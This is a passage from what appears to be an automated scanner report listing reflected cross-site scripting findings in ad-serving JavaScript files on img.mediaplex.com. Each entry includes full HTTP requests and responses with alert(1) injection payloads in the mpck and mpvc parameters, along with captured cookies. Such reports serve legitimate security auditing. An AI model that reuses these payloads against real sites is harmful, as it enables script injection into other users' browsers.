GET /content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-4%3Fmpt%3Da66b2970212c4f1bac421f08cc24134f&mpt=a66b2970212c4f1bac421f08cc24134f&mpvc=http://ads.undertone.com/c?oaparams=2__bannerid=215480__campaignid=38114__zoneid=12268__UTLCA=1__cb=44e7cc25d72e4b168d1e56e9e7e61740__bk=lmvt1a__id=cz6y2qdtfvzjhajx3r2zurq1y__oadest=d9ebd"%3balert(1)//fefe5bd1a3a HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:08:54 GMT
Server: Apache
Last-Modified: Mon, 16 May 2011 14:08:48 GMT
ETag: "145c64-f32-4a36531b7dc00"
Accept-Ranges: bytes
Content-Length: 7741
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
" VALUE=\"clickTAG=http://ads.undertone.com/c?oaparams=2__bannerid=215480__campaignid=38114__zoneid=12268__UTLCA=1__cb=44e7cc25d72e4b168d1e56e9e7e61740__bk=lmvt1a__id=cz6y2qdtfvzjhajx3r2zurq1y__oadest=d9ebd";alert(1)//fefe5bd1a3ahttp://altfarm.mediaplex.com%2Fad%2Fck%2F17038-128465-5934-4%3Fmpt%3Da66b2970212c4f1bac421f08cc24134f&clickTag=http://ads.undertone.com/c?oaparams=2__bannerid=215480__campaignid=38114__zoneid=12268__UT
...[SNIP]...

3.116. http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_300x250_DC.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17412/120572/NES0005_JanWB_300x250_DC.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74781"%3balert(1)//e65a7c73e3 was submitted in the mpck parameter. This input was echoed as 74781";alert(1)//e65a7c73e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17412/120572/NES0005_JanWB_300x250_DC.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F17412-120572-6712-5%3Fmpt%3D40912508574781"%3balert(1)//e65a7c73e3&mpt=409125085&mpvc=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/409125085/x15/USNetwork/BCN2010120586_052c_NextEra/NextEra_CC_300x250_DC.html/726348573830336e374e674144526a62? HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308246355891&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:46:32 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 16:16:00 GMT
ETag: "77a6ae-ba8-49a3555301000"
Accept-Ranges: bytes
Content-Length: 6678
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
/ros/300x250/jx/ss/a/L31/409125085/x15/USNetwork/BCN2010120586_052c_NextEra/NextEra_CC_300x250_DC.html/726348573830336e374e674144526a62?http://cdn4.eyewonder.com/cm/ck/17412-120572-6712-5?mpt=40912508574781";alert(1)//e65a7c73e3\" target=\"_blank\">
...[SNIP]...

3.117. http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_300x250_DC.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17412/120572/NES0005_JanWB_300x250_DC.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2705d"%3balert(1)//f98e3d1e36b was submitted in the mpvc parameter. This input was echoed as 2705d";alert(1)//f98e3d1e36b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17412/120572/NES0005_JanWB_300x250_DC.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F17412-120572-6712-5%3Fmpt%3D409125085&mpt=409125085&mpvc=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/409125085/x15/USNetwork/BCN2010120586_052c_NextEra/NextEra_CC_300x250_DC.html/726348573830336e374e674144526a62?2705d"%3balert(1)//f98e3d1e36b HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308246355891&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:46:55 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 16:16:00 GMT
ETag: "77a6ae-ba8-49a3555301000"
Accept-Ranges: bytes
Content-Length: 6667
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
tp://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/409125085/x15/USNetwork/BCN2010120586_052c_NextEra/NextEra_CC_300x250_DC.html/726348573830336e374e674144526a62?2705d";alert(1)//f98e3d1e36bhttp://cdn4.eyewonder.com%2Fcm%2Fck%2F17412-120572-6712-5%3Fmpt%3D409125085&clickTag=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/300x250/jx/ss/a/L31/409125085/x15/USNetwork/
...[SNIP]...

3.118. http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_728x90_DC.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17412/120572/NES0005_JanWB_728x90_DC.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 434b3"%3balert(1)//dba65fe2331 was submitted in the mpck parameter. This input was echoed as 434b3";alert(1)//dba65fe2331 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17412/120572/NES0005_JanWB_728x90_DC.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F17412-120572-6712-0%3Fmpt%3D1984547796434b3"%3balert(1)//dba65fe2331&mpt=1984547796&mpvc=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1984547796/Top1/USNetwork/BCN2010120586_052c_NextEra/NextEra_CC_728x90_DC.html/726348573830336e374e674144526a62? HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308246354487&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:46:32 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 16:18:29 GMT
ETag: "66ccb8-ba0-49a355e119f40"
Accept-Ranges: bytes
Content-Length: 6696
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
ros/728x90/jx/ss/a/L30/1984547796/Top1/USNetwork/BCN2010120586_052c_NextEra/NextEra_CC_728x90_DC.html/726348573830336e374e674144526a62?http://cdn4.eyewonder.com/cm/ck/17412-120572-6712-0?mpt=1984547796434b3";alert(1)//dba65fe2331\" target=\"_blank\">
...[SNIP]...

3.119. http://img.mediaplex.com/content/0/17412/120572/NES0005_JanWB_728x90_DC.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17412/120572/NES0005_JanWB_728x90_DC.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31c03"%3balert(1)//8febcb22f9b was submitted in the mpvc parameter. This input was echoed as 31c03";alert(1)//8febcb22f9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17412/120572/NES0005_JanWB_728x90_DC.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F17412-120572-6712-0%3Fmpt%3D1984547796&mpt=1984547796&mpvc=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1984547796/Top1/USNetwork/BCN2010120586_052c_NextEra/NextEra_CC_728x90_DC.html/726348573830336e374e674144526a62?31c03"%3balert(1)//8febcb22f9b HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308246354487&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:46:55 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 16:18:29 GMT
ETag: "66ccb8-ba0-49a355e119f40"
Accept-Ranges: bytes
Content-Length: 6672
Content-Type: application/x-javascript

function MediaplexFlashAOL(){
var mp_swver = 0, mp_html = "";

if( navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"] && navigator.mimeTypes["application/x-shockwave-flash"].
...[SNIP]...
tp://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1984547796/Top1/USNetwork/BCN2010120586_052c_NextEra/NextEra_CC_728x90_DC.html/726348573830336e374e674144526a62?31c03";alert(1)//8febcb22f9bhttp://cdn4.eyewonder.com%2Fcm%2Fck%2F17412-120572-6712-0%3Fmpt%3D1984547796&clickTag=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1984547796/Top1/USNetwor
...[SNIP]...

3.120. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17985/125897/728x90_Mits_Res_060111.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538ba"-alert(1)-"27ec7a1a511 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17985/125897/728x90_Mits_Res_060111.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17985-125897-6712-46%3Fmpt%3D835797786538ba"-alert(1)-"27ec7a1a511&mpt=835797786&mpvc=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/835797786/Top1/USNetwork/BCN2011030142_078_Mitsubishi/Mitsubishi_AV_RON_728.html/726348573830336e374e674144526a62? HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308244493867&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:15:33 GMT
Server: Apache
Last-Modified: Thu, 02 Jun 2011 17:40:14 GMT
ETag: "57b48a-f71-4a4be212a3b80"
Accept-Ranges: bytes
Content-Length: 5103
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F17985-125897-6712-46%3Fmpt%3D835797786538ba"-alert(1)-"27ec7a1a511");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F17985-125897-6712-46%3Fmpt%3D835797786538ba"-alert(1)-"27ec7a1a511");
mpck =
...[SNIP]...

3.121. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17985/125897/728x90_Mits_Res_060111.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f56bc'%3balert(1)//a400276733f was submitted in the mpck parameter. This input was echoed as f56bc';alert(1)//a400276733f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17985/125897/728x90_Mits_Res_060111.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17985-125897-6712-46%3Fmpt%3D835797786f56bc'%3balert(1)//a400276733f&mpt=835797786&mpvc=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/835797786/Top1/USNetwork/BCN2011030142_078_Mitsubishi/Mitsubishi_AV_RON_728.html/726348573830336e374e674144526a62? HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308244493867&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:15:35 GMT
Server: Apache
Last-Modified: Thu, 02 Jun 2011 17:40:14 GMT
ETag: "57b48a-f71-4a4be212a3b80"
Accept-Ranges: bytes
Content-Length: 5109
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
28x90/jx/ss/a/L30/835797786/Top1/USNetwork/BCN2011030142_078_Mitsubishi/Mitsubishi_AV_RON_728.html/726348573830336e374e674144526a62?http://altfarm.mediaplex.com/ad/ck/17985-125897-6712-46?mpt=835797786f56bc';alert(1)//a400276733f" target="_blank">
...[SNIP]...

3.122. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17985/125897/728x90_Mits_Res_060111.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e8e0'%3balert(1)//5e031d91696 was submitted in the mpvc parameter. This input was echoed as 9e8e0';alert(1)//5e031d91696 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17985/125897/728x90_Mits_Res_060111.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17985-125897-6712-46%3Fmpt%3D835797786&mpt=835797786&mpvc=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/835797786/Top1/USNetwork/BCN2011030142_078_Mitsubishi/Mitsubishi_AV_RON_728.html/726348573830336e374e674144526a62?9e8e0'%3balert(1)//5e031d91696 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308244493867&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:16:00 GMT
Server: Apache
Last-Modified: Thu, 02 Jun 2011 17:40:14 GMT
ETag: "57b48a-f71-4a4be212a3b80"
Accept-Ranges: bytes
Content-Length: 5105
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/835797786/Top1/USNetwork/BCN2011030142_078_Mitsubishi/Mitsubishi_AV_RON_728.html/726348573830336e374e674144526a62?9e8e0';alert(1)//5e031d91696http://altfarm.mediaplex.com/ad/ck/17985-125897-6712-46?mpt=835797786" target="_blank">
...[SNIP]...

3.123. http://img.mediaplex.com/content/0/17985/125897/728x90_Mits_Res_060111.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/17985/125897/728x90_Mits_Res_060111.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72709"%3balert(1)//6fd21caba90 was submitted in the mpvc parameter. This input was echoed as 72709";alert(1)//6fd21caba90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/17985/125897/728x90_Mits_Res_060111.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F17985-125897-6712-46%3Fmpt%3D835797786&mpt=835797786&mpvc=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/835797786/Top1/USNetwork/BCN2011030142_078_Mitsubishi/Mitsubishi_AV_RON_728.html/726348573830336e374e674144526a62?72709"%3balert(1)//6fd21caba90 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308244493867&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=173274949960; mojo1=s/137381247401/80; mojo2=14302:16279/13198:5934; mojo3=17985:6712/17038:5934/14302:2056/12760:2414/12309:23636/9966:1105/17550:1884/15017:13113/1551:9866/9700:21584/10759:1104/12124:36735/14855:1178/10433:17922/13198:5934/9608:1178/14207:2056/13754:29158

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:15:58 GMT
Server: Apache
Last-Modified: Thu, 02 Jun 2011 17:40:14 GMT
ETag: "57b48a-f71-4a4be212a3b80"
Accept-Ranges: bytes
Content-Length: 5105
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/835797786/Top1/USNetwork/BCN2011030142_078_Mitsubishi/Mitsubishi_AV_RON_728.html/726348573830336e374e674144526a62?72709";alert(1)//6fd21caba90");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/835797786/Top1/USNetwork/BCN2011
...[SNIP]...

3.124. http://img.mediaplex.com/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1537"%3balert(1)//429d87c45a was submitted in the mpck parameter. This input was echoed as b1537";alert(1)//429d87c45a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/711/126780/82996_US_2011_Q2_Fathers_Day_Default_300x250.js?mpck=rover.ebay.com%2Frover%2F1%2F711-126780-2042-1%2F4%3Fmpt%3D1308248221%26siteid%3D0%26Perf_Tracker_1%3D0000768033%26Perf_Tracker_2%3D0001004438%26Perf_Tracker_3%3D1183%26adid%3D328072%26imp_id%3D2884646768651692769%26fcid%3D328062%26ir_DAP_I131%3D3%26ir_DAP_I132%3D1%26ir_DAP_I133%3D3666b2e01300a47a44d622a6ffc193724fc23203%26ir_DAP_I5%3D1%26ir_DAP_I6%3D0%26ir_DAP_I129%3D%26ir_DAP_I130%3D%26ir_DAP_I101%3D0%26ir_DAP_I105%3D0%26ir_DAP_I106%3D0%26rvr_id%3D240959564892%26imp_rvr_id%3D240959564892b1537"%3balert(1)//429d87c45a&mpt=1308248221&siteid=0&Perf_Tracker_1=0000768033&Perf_Tracker_2=0001004438&Perf_Tracker_3=1183&adid=328072&imp_id=2884646768651692769&fcid=328062&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=3666b2e01300a47a44d622a6ffc193724fc23203&ir_DAP_I5=1&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=240959564892&imp_rvr_id=240959564892&mpvc=http%3A%2F%2Fib.adnxs.com%2Fclick%3FAAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOFq9tvzUggo_ayDGovBdy-dSPpNAAAAAGc2BwBkAAAAZAAAAAIAAACuDgUAh7wAAAEAAABVU0QAVVNEACwB-gBXIQAAowQAAgMCAQUAAAAAPBQcPAAAAAA.%2Fcnd%3D%216gSCKQj4uwIQrp0UGIf5AiAD%2Freferrer%3Dhttp%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F677%252Fcnbc%252F300x250%252Fatf%253Ft%253D1308248220548%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253DUniversalAudiencePlatform23.com%2526refer%253Dhttp%25253A%25252F%25252Fwww.cnbc.com%25252Fid%25252F43422860%2Fclickenc%3Dhttp%253A%252F%252Fr1-ads.ace.advertising.com%252Fclick%252Fsite%253D0000768033%252Fmnum%253D0001004438%252Fcstr%253D43472790%253D_4dfa489d%252C2003200856%252C768033%255E1004438%255E1183%255E0%252C1_%252Fxsxdata%253D%2524XSXDATA%252Fbnum%253D43472790%252Foptn%253D64%253Ftrg%253D HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308248220548&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
